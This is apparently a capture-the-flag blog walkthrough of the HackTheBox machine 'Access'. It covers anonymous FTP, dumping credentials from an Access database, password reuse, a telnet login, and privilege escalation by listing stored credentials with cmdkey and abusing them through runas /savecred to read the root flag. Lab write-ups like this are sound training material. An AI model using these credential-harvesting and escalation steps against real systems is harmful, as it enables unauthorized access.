Access was an interesting, easy little box. Though a Windows box, it only had a few ports open. The biggest problems here are the open FTP and telnet. These were the primary accesses and points of data exfiltration and infiltration.
As usual, we start with a typical port scan. Right away, we see that port 80 is open, so browse to it. It only loads a single image:
Taking a look at the source of the page didn't give all that much either. A further detailed nmap service scan on port 80 didn't yeild all that much either. I doubt this is an entry point.
Moving on to the other ports, we see that port 23 (telnet) is open. telnet'ing to that port gets us a login prompt, but we don't have any credentials to really try (admin:admin didn't work, and with HTB, brute force is never the answer). So there's got to be a hint elsewhere...
Back to the port scan, we see that FTP is open too, and a detailed service scan shows us that anonymous access is allowed!
Connecting to the FTP server and perusing the filesystem shows us 2 files:
Yeah, these are relevant, so download them both. With Kali, I can "open" the zip file, see that there's a .pst file therein, but cannot extract it as it is password protected. Again, brute force is never the answer with HTB, so this is either another red herring, or the password is elsewhere.
That leaves the backup.mbd file. It's been so long that I actually forgot that .mdb files are Microsoft Access database files, and had to search it up :S But once I did so, I found a tool on Kali, "mdbtools", which consist of a few different "mdb-*" commands. Eventually, I figured a couple commands to dump the entire database to a text file:
mdb-tables backup.mdb| tr " " "\n" > tables.txt
while read TABLE; do echo "TABLE: "$TABLE; echo; mdb-export backup.mdb $TABLE; echo; echo; done < tables.txt > contents.txt
Looking through the contents in a text viewer, I could easily identify the "empty" tables, and which ones contained "data". That's when I found a really interesting table: "auth_user". Here we have a couple usernames and plaintext passwords. Sure, admin:admin is in there, and that didn't work... but there's another, "atypical" username and password.
On a hunch, I try the password on the zip file, and sure enough, the password is being reused here. Now I can extract that .pst file!
While searching for a way to convert and open a .pst file, I discovered that Evolution, a linux email client, can just import them, straight up, so I do that. It only imports a single email, but it's all we need. The email seems to be from a team lead of sorts, to their minions, reminding them of a recent password change.
Taking these new credentials, I go back to telnet on port 23. And sure enough, the credentials in the email work! Ad right away, we can get the user flag: C:\Users\security\Desktop\user.txt. No on to some privilege escalation...
Perusing the filesystem, I stumble across an interesting looking folder:
Running the command,
searchsploit zkteco, suggests that I can exploit this to gain root (admin), but I would have to "change the executable file with a binary of choice". And to be honest, I am not entirely too sure what this means... I mean, I know it's telling me to swap binaries.... but which? While trying to figure this out, I came across an article that mentioned checking for stored credentials with
cmdkey /list, so I do so as well. Sure enough, there's some stored administrator credentials. Now I know I can use this with
runas /savecred, so run the following:
runas /user:ACCESS\Administrator /savecred "cmd.exe /c type c:\users\administrator\desktop\root.txt > c:\flag.txt"
And BOOM! There's the root flag! DONE!
Report for Jerry on HackTheBox.eu
|2020-08-03 424.88 KB 0||
Only registered and logged in users can download this file.
For my report, I tried checking our Dradis, but couldn't quite figure out how to get the results I am looking for, without wasting an inordinate amount of time on each "engagement" or "project", and since the free Community Edition limits you to the single/active project and cannt "template" projects, I set that one to the side for now. So I just used CherryTree to enter my notes. This time, I tried to keep them a little "cleaner", and include a bit more detail (including some remediation suggests) before exporting it to a PDF file, but I will admit, I still have some progress top make there.